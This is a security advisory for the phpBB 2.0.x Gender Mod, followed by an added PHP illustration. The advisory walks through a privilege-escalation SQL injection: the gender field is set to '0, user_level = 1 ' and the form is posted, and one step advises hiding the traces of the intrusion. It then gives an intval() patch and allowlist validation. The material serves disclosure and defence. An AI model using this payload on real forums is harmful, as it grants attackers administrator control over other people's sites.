Security flaw in the php forum 2.0.x



## Description:
## Gender Mod is a commonly used modification in official phpBB releases.
## Because the posted value is not validated, extra column assignments can be
## appended to the UPDATE SQL command.
## This affects even the newest version, 1.1.3.
## If you assign the value 'user_level = 1', you will have ADMINISTRATOR
## PRIVILEGE in the forum.
##
## Exploit:
## 1. Save the User Profile page to your disk to modify it offline.
## 2. Add the correct full post action address (http://forum.victim.com/...):
## <FORM action=http://forum.victim.com/profile.php?sid=<current_session_id> method=post
## encType=multipart/form-data>
## 3. Modify the HTML form so that the input field "gender" has a value like:
## <input type=text name=gender value="0, user_level = 1 ">
## 4. Load this page in the same browser window where the cookie is still available.
## Take care of all your work to hide the traces of your hacking and finally hit Submit
## to change the user profile. You're done.
##
## Patch:
## File To Patch:
## forumroot/includes/usercp_register.php
##
## Note.
## The phpBB team has also been emailed about this problem.
##

#########################################################################
# Patch
#
#-----[ OPEN ]------------------------------------------
#
forumroot/includes/usercp_register.php
#
#-----[ FIND ]------------------------------------------
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS['gender'] : 0;
#
#-----[ REPLACE AS ]------------------------------------
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval($HTTP_POST_VARS['gender']) : 0;
#
#-----[ SAVE/CLOSE/UPLOAD THIS FILE ]-------------------
#
# EoP
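To show why the one-line intval() patch closes the hole, here is an added PHP example that is not part of the advisory or of phpBB itself: it rebuilds the UPDATE statement from the posted gender value both ways, and adds a stricter allowlist check as a further, assumed defence. The table and column names (phpbb_users, user_gender) and the meaning of the three gender codes are assumptions.

```php
<?php
// Added example (not code from the advisory or from phpBB): the vulnerable
// pattern the advisory describes beside the patched one, in isolation.
// Table and column names (phpbb_users, user_gender) are assumed for illustration.

// Vulnerable builder: the posted value is spliced into the SQL text unchanged,
// so anything after the number becomes part of the SET list.
function build_update_unsafe(int $user_id, $posted_gender): string
{
    $gender = isset($posted_gender) ? $posted_gender : 0;
    return "UPDATE phpbb_users SET user_gender = $gender WHERE user_id = $user_id";
}

// Patched builder (the advisory's fix): intval() keeps only the leading integer,
// so any text appended to the value is discarded before it reaches the query.
function build_update_patched(int $user_id, $posted_gender): string
{
    $gender = isset($posted_gender) ? intval($posted_gender) : 0;
    return "UPDATE phpbb_users SET user_gender = $gender WHERE user_id = $user_id";
}

// Defence in depth (an assumption, not part of the advisory): accept only the
// values the form offers and reject, rather than silently coerce, anything else.
// The three codes are assumed to mean unspecified / male / female.
function validate_gender($posted_gender): int
{
    $allowed = [0, 1, 2];
    $value = filter_var($posted_gender, FILTER_VALIDATE_INT);
    if ($value === false || !in_array($value, $allowed, true)) {
        throw new InvalidArgumentException('gender must be one of 0, 1, 2');
    }
    return $value;
}

// Constructed input: the malformed form value quoted in the advisory.
$posted = '0, user_level = 1 ';

// Unsafe: the appended assignment survives into the statement.
echo build_update_unsafe(42, $posted), PHP_EOL;
// Patched: only the integer part of the value remains.
echo build_update_patched(42, $posted), PHP_EOL;
// Allowlist: the value is refused outright instead of being coerced.
try {
    validate_gender($posted);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Comparing the two printed statements makes the audit check concrete: any integer column written from request data must be coerced or validated before concatenation, and a parameterised query removes the concatenation altogether.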